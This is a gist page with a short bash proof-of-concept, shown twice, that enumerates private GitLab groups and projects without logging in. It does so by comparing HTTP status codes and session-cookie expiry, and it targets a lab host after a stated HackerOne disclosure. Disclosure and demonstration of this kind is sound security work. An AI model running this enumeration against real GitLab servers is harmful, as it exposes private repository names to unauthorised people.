TheGroundZero/gitlab_enum.sh

## gitlab_enum.sh
#!/bin/bash

# Script by TheGroundZero (@DezeStijn)
#
# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/
# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96
#
# Using a difference in behaviour by Gitlab in setting cookies
# it's possible to enumerate/bruteforce groups/projects
# as an unauthenticated user.
#
# This code was written purely for a demo.
# With some reworking this could work with wordlist files
# and even be multithreaded.
#
# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04
# https://hackerone.com/reports/891055
#
# Free to use, but please do refer to this original gist.
#
# https://github.com/TheGroundZero
# https://twitter.com/DezeStijn/
# https://sequr.be/ | http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/
#

groups="root grouppublic groupinternal groupprivate"
projects="projectpublic projectinternal projectprivate"
url="http://gitlab.lab.local"

print_exists() {
	if [ $1 -eq 1 ]; then
		echo -e "\e[92m[+]\e[0m $2"
	else
		echo -e "\e[91m[-]\e[0m $2"
	fi
}

check_cookie() {
	status=`curl -s -o /dev/null -w "%{http_code}" "$1"`
	#echo "[i] HTTP code = $status"
	if [ $status -eq 200 ]; then
		print_exists 1 $1
	else
		expire=`curl --junk-session-cookies --cookie-jar - "$1" 2>/dev/null | awk '/_gitlab_session/ {print $5}'`
		#echo "[i] Expire = $expire"
		if [ $expire -gt 0 ]; then
			print_exists 0 $1
		else
			print_exists 1 $1
		fi
	fi
}

for group in $groups; do
	echo "[*] Group: $group"
	#echo "[*] Testing: $url/$group"
	check_cookie "$url/$group"

	for project in $projects; do
		echo "[*] Project: $project"
		#echo "[*] Testing: $url/$group/$project"
		check_cookie "$url/$group/$project"
	done
	echo ""
done
	#!/bin/bash

	# Script by TheGroundZero (@DezeStijn)
	#
	# https://sequr.be/blog/2020/06/gitlab-unauthenticated-group-and-project-enumeration/
	# https://gist.github.com/TheGroundZero/ea067760fd6c3854238f098cb075bf96
	#
	# Using a difference in behaviour by Gitlab in setting cookies
	# it's possible to enumerate/bruteforce groups/projects
	# as an unauthenticated user.
	#
	# This code was written purely for a demo.
	# With some reworking this could work with wordlist files
	# and even be multithreaded.
	#
	# Responsibly disclosed to Gitlab via HackerOne on 2020-06-04
	# https://hackerone.com/reports/891055
	#
	# Free to use, but please do refer to this original gist.
	#
	# https://github.com/TheGroundZero
	# https://twitter.com/DezeStijn/
	# https://sequr.be/ \| http://sequrx53bdtvizjsbcdibrugpg7fujhvx7b75rvhwh2kq3i4hhvh35qd.onion/
	#

	groups="root grouppublic groupinternal groupprivate"
	projects="projectpublic projectinternal projectprivate"
	url="http://gitlab.lab.local"

	print_exists() {
	if [ $1 -eq 1 ]; then
	echo -e "\e[92m[+]\e[0m $2"
	else
	echo -e "\e[91m[-]\e[0m $2"
	fi
	}

	check_cookie() {
	status=`curl -s -o /dev/null -w "%{http_code}" "$1"`
	#echo "[i] HTTP code = $status"
	if [ $status -eq 200 ]; then
	print_exists 1 $1
	else
	expire=`curl --junk-session-cookies --cookie-jar - "$1" 2>/dev/null \| awk '/_gitlab_session/ {print $5}'`
	#echo "[i] Expire = $expire"
	if [ $expire -gt 0 ]; then
	print_exists 0 $1
	else
	print_exists 1 $1
	fi
	fi
	}

	for group in $groups; do
	echo "[*] Group: $group"
	#echo "[*] Testing: $url/$group"
	check_cookie "$url/$group"

	for project in $projects; do
	echo "[*] Project: $project"
	#echo "[*] Testing: $url/$group/$project"
	check_cookie "$url/$group/$project"
	done
	echo ""
	done